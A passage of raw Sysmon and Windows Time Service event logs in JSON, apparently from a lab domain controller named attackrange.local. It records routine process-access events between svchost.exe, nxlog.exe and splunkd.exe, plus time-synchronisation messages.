C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:46.082\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:46.082","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:47.098\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:47.098","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":144,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76842,"ProcessID":1196,"ThreadID":1384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has stopped advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:49:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":35,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76843,"ProcessID":1196,"ThreadID":1384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service is now synchronizing the system time with the time source time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 06:49:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:48.113\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:48.113","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:49.117\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 